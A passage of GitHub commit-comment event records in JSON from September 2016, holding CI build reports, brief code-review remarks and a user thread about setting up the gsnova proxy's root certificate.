commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/yinqiwen/gsnova/commit/\n> 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AK_\n> y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-11T02:00:15Z"}
{"id":"4545065288","type":"CommitCommentEvent","actor":{"login":"romeroyonatan"},"repo":{"name":"Grupo106/UI"},"payload":{"comment":{"id":18975683,"position":8,"line":39,"path":"application/controllers/Asistente.php","commit_id":"5df368a81f068bebffb693aedca5b5a427915fb3","created_at":"2016-09-11T02:00:38Z","updated_at":"2016-09-11T02:00:38Z","body":"El directorio es `/tmp`"}},"created_at":"2016-09-11T02:00:38Z"}
{"id":"4545065303","type":"CommitCommentEvent","actor":{"login":"leidawt"},"repo":{"name":"leidawt/py_learn_test"},"payload":{"comment":{"id":18975684,"position":null,"line":null,"path":null,"commit_id":"01e6363948d0bb57d877252def91b8639c6a4621","created_at":"2016-09-11T02:00:40Z","updated_at":"2016-09-11T02:00:40Z","body":"1"}},"created_at":"2016-09-11T02:00:40Z"}
{"id":"4545066622","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975695,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:01:36Z","updated_at":"2016-09-11T02:01:36Z","body":"fix_gcc48_ICE (Unknown) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-11T02:01:36Z"}
{"id":"4545067865","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975697,"position":null,"line":null,"path":null,"commit_id":"0f499f13587410f6f6718f6a7e09687a36194039","created_at":"2016-09-11T02:02:50Z","updated_at":"2016-09-11T02:02:50Z","body":"fix_gcc48_ICE (Unknown) - x86_64-MacOS-10.9-clang: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0f499f13587410f6f6718f6a7e09687a36194039-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0f499f13587410f6f6718f6a7e09687a36194039-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-11T02:02:50Z"}
{"id":"4545068399","type":"CommitCommentEvent","actor":{"login":"matheuss"},"repo":{"name":"zeit/hyperterm"},"payload":{"comment":{"id":18975699,"position":12,"line":28,"path":"README.md","commit_id":"f5b7ed97d94117aa6c10b81127330baa9ce0384f","created_at":"2016-09-11T02:03:20Z","updated_at":"2016-09-11T02:03:20Z","body":"😰 "}},"created_at":"2016-09-11T02:03:20Z"}
{"id":"4545071206","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975735,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-11T02:05:46Z","updated_at":"2016-09-11T02:05:46Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2359 of 2368 tests passed, 0 test warnings)\n\n * 9 tests had: EIO diffs.\n * 8 tests had: ESO big diffs.\n * 9 tests had: Table big diffs.\n * 4 tests had: MTR big diffs.\n * 1 test had: ESO small diffs.\n * 3 tests had: AUD diffs.\n * 3 tests had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.62%25-yellow.svg)</a> \n"}},"created_at":"2016-09-11T02:05:46Z"}
{"id":"4545072988","type":"CommitCommentEvent","actor":{"login":"L4BORG"},"repo":{"name":"dmulloy2/ChestShop-3"},"payload":{"comment":{"id":18975739,"position":null,"line":null,"path":null,"commit_id":"8c7594be51bc6053a30a111e8ac3c15acd280bce","created_at":"2016-09-11T02:07:26Z","updated_at":"2016-09-11T02:07:26Z","body":"I think the problem is ChestShop's Username to UUID database, when a player would change his username his UUID would stay the same, but I think (in some cases or maybe all lol) ChestShop won't handle that properly. I think that's also the reason for this issue: https://github.com/drtshock/Essentials/issues/855"}},"created_at":"2016-09-11T02:07:26Z"}
{"id":"4545074165","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975744,"position":null,"line":null,"path":null,"commit_id":"2fea4525cbbfae07705897b11d432132d9cd8e65","created_at":"2016-09-11T02:08:41Z","updated_at":"2016-09-11T02:08:41Z","body":"Related to: backdrop/backdrop-issues#2150 "}},"created_at":"2016-09-11T02:08:41Z"}
{"id":"4545075453","type":"CommitCommentEvent","actor":{"login":"pheonixstorm"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":18975746,"position":null,"line":null,"path":null,"commit_id":"1f0f0886663e9ae09bb7d5028215cd99caeefbed","created_at":"2016-09-11T02:10:01Z","updated_at":"2016-09-11T02:10:01Z","body":"Could have made the old maps as the optional ones."}},"created_at":"2016-09-11T02:10:01Z"}
{"id":"4545076927","type":"CommitCommentEvent","actor":{"login":"Petitsurume"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18975750,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-11T02:11:27Z","updated_at":"2016-09-11T02:11:27Z","body":"`forProxy`はどう"}},"created_at":"2016-09-11T02:11:27Z"}
{"id":"4545077034","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975751,"position":null,"line":null,"path":null,"commit_id":"c6d2db506be563db53bf651b026bfba5d8bde5ce","created_at":"2016-09-11T02:11:33Z","updated_at":"2016-09-11T02:11:33Z","body":"Related to: backdrop/backdrop-issues#1362 "}},"created_at":"2016-09-11T02:11:33Z"}
{"id":"4545080158","type":"CommitCommentEvent","actor":{"login":"842895893"},"repo":{"name":"842895893/ICS4UR"},"payload":{"comment":{"id":18975756,"position":null,"line":null,"path":null,"commit_id":"67ebdb60c9c91bb8103c48c83f8fa387fcce08c1","created_at":"2016-09-11T02:14:50Z","updated_at":"2016-09-11T02:14:50Z","body":"![img_0221](https://cloud.githubusercontent.com/assets/15019668/18414745/f80cc0aa-77a3-11e6-96a2-bb479c491850.PNG)\r\n![img_0220](https://cloud.githubusercontent.com/assets/15019668/18414747/f939d62a-77a3-11e6-8a24-2d25aa098ce5.PNG)\r\n![img_0218](https://cloud.githubusercontent.com/assets/15019668/18414749/fa4845d8-77a3-11e6-8a0f-3677074ae354.PNG)\r\n"}},"created_at":"2016-09-11T02:14:50Z"}
{"id":"4545081019","type":"CommitCommentEvent","actor":{"login":"xconverge"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18975757,"position":null,"line":null,"path":null,"commit_id":"cbe37e727e9f6cd927c074cda465bb2b25465e28","created_at":"2016-09-11T02:15:42Z","updated_at":"2016-09-11T02:15:42Z","body":"Yes, in the PR I made that comment, this was a short term fix. We said we will just direct people to the new Contributions section of the extension area in vscode 1.5.0+"}},"created_at":"2016-09-11T02:15:42Z"}
{"id":"4545082173","type":"CommitCommentEvent","actor":{"login":"VIZAD"},"repo":{"name":"VIZAD/WITH"},"payload":{"comment":{"id":18975758,"position":null,"line":null,"path":null,"commit_id":"74745f64674350d2773f57b5e66e8b10698f0dad","created_at":"2016-09-11T02:16:44Z","updated_at":"2016-09-11T02:16:44Z","body":"工作效率好快啊"}},"created_at":"2016-09-11T02:16:44Z"}
{"id":"4545083448","type":"CommitCommentEvent","actor":{"login":"842895893"},"repo":{"name":"842895893/ICS4UR"},"payload":{"comment":{"id":18975761,"position":null,"line":null,"path":null,"commit_id":"43ff5b936686c448cac421b82a726a28234c54db","created_at":"2016-09-11T02:18:02Z","updated_at":"2016-09-11T02:18:02Z","body":"![image2](https://cloud.githubusercontent.com/assets/15019668/18414767/6d9748c2-77a4-11e6-848c-031b445f57c8.PNG)\r\n![image1](https://cloud.githubusercontent.com/assets/15019668/18414768/6e37c0a4-77a4-11e6-9110-33cdf4c3d393.PNG)\r\n![image4](https://cloud.githubusercontent.com/assets/15019668/18414769/6eddf410-77a4-11e6-9ac0-5ba0ea0f9722.PNG)\r\n![image3](https://cloud.githubusercontent.com/assets/15019668/18414770/6fa1b03a-77a4-11e6-9c6a-345a8d343ba9.PNG)\r\n"}},"created_at":"2016-09-11T02:18:02Z"}
{"id":"4545084028","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18975765,"position":null,"line":null,"path":null,"commit_id":"72480ef1f771c2e0dabae1e64538da068e4da58f","created_at":"2016-09-11T02:18:34Z","updated_at":"2016-09-11T02:18:34Z","body":"I'll fix for you but please do not keep syncing anymore with the repository RC5. \r\nI thought you were in a rush to open your site.\r\n\r\nHave it RC4.5 and launch your site."}},"created_at":"2016-09-11T02:18:34Z"}
{"id":"4545086188","type":"CommitCommentEvent","actor":{"login":"jrmadsen67"},"repo":{"name":"jrmadsen67/MahanaMailinatorAPI"},"payload":{"comment":{"id":18975770,"position":null,"line":null,"path":null,"commit_id":"0472117104c9d056a8e5058b652e9f33a0764700","created_at":"2016-09-11T02:20:31Z","updated_at":"2016-09-11T02:20:31Z","body":"I'm sorry, I don't understand what your question is"}},"created_at":"2016-09-11T02:20:31Z"}
{"id":"4545086285","type":"CommitCommentEvent","actor":{"login":"Undre4m"},"repo":{"name":"Undre4m/puma"},"payload":{"comment":{"id":18975771,"position":null,"line":null,"path":null,"commit_id":"031c716617a1cdf1d63dadd7a616acbad5eded62","created_at":"2016-09-11T02:20:37Z","updated_at":"2016-09-11T02:20:37Z","body":"Expected result accounts for floating point aberration. Could be compared against a desired precision with Number.toPrecision() or avoid the use of floating point elements in the test Array."}},"created_at":"2016-09-11T02:20:37Z"}
{"id":"4545086774","type":"CommitCommentEvent","actor":{"login":"xiaomogu1"},"repo":{"name":"xiaomogu1/reagroup"},"payload":{"comment":{"id":18975772,"position":null,"line":null,"path":null,"commit_id":"ae222f790906b1b49f958198bb1b57b66cbe64cd","created_at":"2016-09-11T02:21:09Z","updated_at":"2016-09-11T02:21:09Z","body":"Input command is from the given file, if no input file path is detected, default file will be used. "}},"created_at":"2016-09-11T02:21:09Z"}
{"id":"4545087189","type":"CommitCommentEvent","actor":{"login":"livotov"},"repo":{"name":"coomar2841/android-multipicker-library"},"payload":{"comment":{"id":18975773,"position":null,"line":null,"path":null,"commit_id":"29e7bddef2813666c3158610de59959b7d470490","created_at":"2016-09-11T02:21:35Z","updated_at":"2016-09-11T02:21:35Z","body":"Why did you change \".\" to the File.separator constant here ? This breaks the functionality again as File.separator separates paths, this is not an extension symbol. Now the final file looks like\r\n\r\npictures/10299af3-93ac-445f-900f-fbff5a1d36f8/jpeg\r\n\r\nand \r\n\r\na) it produces one more level in directory structure\r\nb) brings back previous bug where the file did not have a proper extension\r\n"}},"created_at":"2016-09-11T02:21:35Z"}
{"id":"4545091716","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975776,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:26:28Z","updated_at":"2016-09-11T02:26:28Z","body":"fix_gcc48_ICE (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2367 of 2368 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-11T02:26:28Z"}
{"id":"4545092225","type":"CommitCommentEvent","actor":{"login":"vshl"},"repo":{"name":"vshl/openmrs-core"},"payload":{"comment":{"id":18975777,"position":null,"line":null,"path":null,"commit_id":"ad49cd14bfe2006f6271d81a147874b0fea53296","created_at":"2016-09-11T02:27:02Z","updated_at":"2016-09-11T02:27:02Z","body":"@wluyima  I added it in the previous commit. Then again, I have to incorporate the new primary key column cohort_member_id as suggested by you.\r\n \r\n```\r\n    <changeSet author=\"ben (generated)\" id=\"1227303685425-2\">\r\n        <createTable tableName=\"cohort_member\">\r\n            <column defaultValueNumeric=\"0\" name=\"cohort_id\" type=\"int\">\r\n                <constraints nullable=\"false\"/>\r\n            </column>\r\n            <column defaultValueNumeric=\"0\" name=\"patient_id\" type=\"int\">\r\n                <constraints nullable=\"false\"/>\r\n            </column>\r\n        </createTable>\r\n    </changeSet>\r\n    <changeSet author=\"vshankar\" id=\"TRUNK-4096-1\">\r\n        <preConditions onFail=\"MARK_RAN\">\r\n            <not>\r\n                <columnExists tableName=\"cohort_member\" columnName=\"start_date\"/>\r\n            </not>\r\n        </preConditions>\r\n        <addColumn tableName=\"cohort_member\">\r\n            <column name=\"start_date\" type=\"datetime\"/>\r\n        </addColumn>\r\n    </changeSet>\r\n    <changeSet author=\"vshankar\" id=\"TRUNK-4096-2\">\r\n        <preConditions onFail=\"MARK_RAN\">\r\n            <not>\r\n                <columnExists tableName=\"cohort_member\" columnName=\"end_date\"/>\r\n            </not>\r\n        </preConditions>\r\n        <addColumn tableName=\"cohort_member\">\r\n            <column name=\"end_date\" type=\"datetime\"/>\r\n        </addColumn>\r\n    </changeSet>\r\n```\r\n\r\nThis is what I'm doing to add a primary key:\r\n\r\n```\r\n    <changeSet author=\"vshankar\" id=\"TRUNK-4906-3\">\r\n        <preConditions>\r\n            <primaryKeyExists tableName=\"cohort_member\"/>\r\n        </preConditions>\r\n        <dropPrimaryKey constraintName=\"\" tableName=\"cohort_member\"/>\r\n    </changeSet>\r\n    <changeSet author=\"vshankar\" id=\"TRUNK-4906-4\">\r\n        <preConditions>\r\n            <not>\r\n                <primaryKeyExists tableName=\"cohort_member\"/>\r\n            </not>\r\n        </preConditions>\r\n        <addPrimaryKey tableName=\"cohort_member\" columnNames=\"cohort_member_id\"/>\r\n    </changeSet>\r\n```\r\n\r\nHope it is correct?!"}},"created_at":"2016-09-11T02:27:02Z"}
{"id":"4545092908","type":"CommitCommentEvent","actor":{"login":"takehiromouri"},"repo":{"name":"Fortax-N/fortax"},"payload":{"comment":{"id":18975778,"position":8,"line":8,"path":"spec/models/company_spec.rb","commit_id":"8cdbf34f20bd41c6dd2b67fa7cdee1ccf3b13964","created_at":"2016-09-11T02:27:45Z","updated_at":"2016-09-11T02:27:45Z","body":"shoulda matchers actually don't need to be contained within a block - you can just put it at the top of the spec:\r\n```\r\nRSpec.describe Company, type: :model do\r\n  it {should validate_presence_of :phone_number}\r\n  it {should validate_presence_of :email}\r\n```"}},"created_at":"2016-09-11T02:27:45Z"}
{"id":"4545093562","type":"CommitCommentEvent","actor":{"login":"ney1991"},"repo":{"name":"dominguezudenar/grupo1_septimo_nube"},"payload":{"comment":{"id":18975779,"position":14,"line":14,"path":"index.php","commit_id":"ae274938846c4c65f5162ae7fd748cff7821a8c2","created_at":"2016-09-11T02:28:26Z","updated_at":"2016-09-11T02:28:26Z","body":"echo \"hola mundo\""}},"created_at":"2016-09-11T02:28:26Z"}
{"id":"4545095585","type":"CommitCommentEvent","actor":{"login":"Jonathan50"},"repo":{"name":"Jonathan50/do-it"},"payload":{"comment":{"id":18975780,"position":null,"line":null,"path":null,"commit_id":"e04a636f0047f5edc5b2c6215eb1569cc8e1434b","created_at":"2016-09-11T02:30:31Z","updated_at":"2016-09-11T02:30:31Z","body":"I meant to say \"ok\" not \"be polite\" 😆"}},"created_at":"2016-09-11T02:30:31Z"}
{"id":"4545096505","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"Team488/SeriouslyCommonLib"},"payload":{"comment":{"id":18975782,"position":null,"line":null,"path":null,"commit_id":"2d7424451f95e210f81288f764ac3d8cf0b4fffd","created_at":"2016-09-11T02:31:32Z","updated_at":"2016-09-11T02:31:32Z","body":"Keep in mind that this model will be different for CANTalons (the controller plays the role of the maintainer in that case). Not sure how that plays into this."}},"created_at":"2016-09-11T02:31:32Z"}
{"id":"4545096922","type":"CommitCommentEvent","actor":{"login":"hanxueluo"},"repo":{"name":"openvswitch/ovs"},"payload":{"comment":{"id":18975783,"position":null,"line":null,"path":null,"commit_id":"67762449ecbf282f0667fa8b31df68602a497619","created_at":"2016-09-11T02:31:59Z","updated_at":"2016-09-11T02:31:59Z","body":"I think \"br-int\" should be \"${bridge}\" here."}},"created_at":"2016-09-11T02:31:59Z"}
{"id":"4545096978","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/Homebrew.jl"},"payload":{"comment":{"id":18975784,"position":null,"line":null,"path":null,"commit_id":"e85465bd6ae80c364f98b5f44a4a809b0ed210b2","created_at":"2016-09-11T02:32:02Z","updated_at":"2016-09-11T02:32:02Z","body":"docstrings?"}},"created_at":"2016-09-11T02:32:02Z"}
{"id":"4545098281","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975785,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:33:08Z","updated_at":"2016-09-11T02:33:08Z","body":"fix_gcc48_ICE (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-11T02:33:08Z"}
{"id":"4545099004","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975788,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:33:59Z","updated_at":"2016-09-11T02:33:59Z","body":"fix_gcc48_ICE (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-11T02:33:59Z"}
{"id":"4545099791","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975789,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:34:50Z","updated_at":"2016-09-11T02:34:50Z","body":"fix_gcc48_ICE (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-11T02:34:50Z"}
{"id":"4545099964","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18975790,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-11T02:35:02Z","updated_at":"2016-09-11T02:35:02Z","body":"Yes, already import the fakecert into trusted root certification\nauthorities, but still cannot work and always report \"your link is not a\nprivate link\" . Also the same result to Ubuntu platform\nCan u test it  from your side?\n\n2016-09-11 10:00 GMT+08:00 yinqiwen <notifications@github.com>:\n\n> the cert file must be added into trusted root certification authorities\n> store. This is a example\n> https://blogs.technet.microsoft.com/sbs/2008/05/08/\n> installing-a-self-signed-certificate-as-a-trusted-root-\n> ca-in-windows-vista/\n>\n> 2016年9月11日 上午9:25，\"yuan78\" <notifications@github.com>写道：\n>\n> > Have imported fakecert, but the browser Chrome still report https error\n> of\n> > \"your link is not a private link\"\n> >\n> > 2016-09-10 23:40 GMT+08:00 yinqiwen <notifications@github.com>:\n> >\n> > > Add your ip into hosts.json. For gae, u should configure your ip for\n> '*.\n> > > appspot.com' .\n> > >\n> > > For fakecert issue, u must import the 'Fake-ACRoot-Certificate.cer'\n> into\n> > > your os's root CA to avoid the warnings of browsers, u can follow\n> 12306's\n> > > guide to import a root CA file. (12306 force u to import it's root CA\n> > file\n> > > if u want to use it's service.)\n> > >\n> > > u can generate the facecert files by openssl's command line tools, but\n> > > it's complicated and i'm not remember how to do it now, can not give\n> any\n> > > advice.\n> > >\n> > > —\n> > > You are receiving this because you commented.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/yinqiwen/gsnova/commit/\n> > 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18974012>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/AK_\n> > y78F4q51vGBuBjmWYsGZI0uNCwYwiks5qos9hgaJpZM4J5oQB>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/yinqiwen/gsnova/commit/\n> 54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975617>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AANmT0eqmWquNK2el3MjABw0GcS84g6Yks5qo1iIgaJpZM4J5oQB>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yinqiwen/gsnova/commit/54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361#commitcomment-18975681>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AK_y729lEUAaewvv8nY3I0BCa_rShYe_ks5qo2CygaJpZM4J5oQB>\n> .\n>\n"}},"created_at":"2016-09-11T02:35:02Z"}
{"id":"4545100534","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975792,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:35:37Z","updated_at":"2016-09-11T02:35:37Z","body":"I got that OOM error too even I have 8GiB of RAM. Add ```-Xmx4g``` to ```JACK_SERVER_COMMAND``` in ```prebuilts/sdk/tools/jacks/jack-admin``` solves it."}},"created_at":"2016-09-11T02:35:37Z"}
{"id":"4545100542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975791,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:35:37Z","updated_at":"2016-09-11T02:35:37Z","body":"fix_gcc48_ICE (Unknown) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-11T02:35:37Z"}
{"id":"4545100747","type":"CommitCommentEvent","actor":{"login":"harshavardhana"},"repo":{"name":"abperiasamy/rtl8812AU_8821AU_linux"},"payload":{"comment":{"id":18975793,"position":null,"line":null,"path":null,"commit_id":"09a1e212b643c2ad01824fda27ce613489ba2de4","created_at":"2016-09-11T02:35:49Z","updated_at":"2016-09-11T02:35:49Z","body":"This patch introduces problems for lower kernels, reverting this.  Please resubmit with proper fix for 4.x kernels and 4.8"}},"created_at":"2016-09-11T02:35:49Z"}
{"id":"4545102226","type":"CommitCommentEvent","actor":{"login":"torusrxxx"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18975796,"position":115,"line":133,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-11T02:37:22Z","updated_at":"2016-09-11T02:37:22Z","body":"Fixed by processing context menu event in the parent.\n"}},"created_at":"2016-09-11T02:37:22Z"}
{"id":"4545104929","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975801,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T02:40:12Z","updated_at":"2016-09-11T02:40:12Z","body":"News about cm14 dude?"}},"created_at":"2016-09-11T02:40:12Z"}
{"id":"4545107021","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975804,"position":null,"line":null,"path":null,"commit_id":"3ace3ce28625b580113bc8e513ce7e671b9538a2","created_at":"2016-09-11T02:42:31Z","updated_at":"2016-09-11T02:42:31Z","body":"I synced new sources. The build is now in progress.\n\n2016-09-11 9:40 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n\n> News about cm14 dude?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/3ace3ce28625b580113bc8e513ce7e671b9538a2#commitcomment-18975801>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9jXrJmLYHIznCweGsX43VMiQjZEKks5qo2oNgaJpZM4J54sr>\n> .\n>\n"}},"created_at":"2016-09-11T02:42:31Z"}
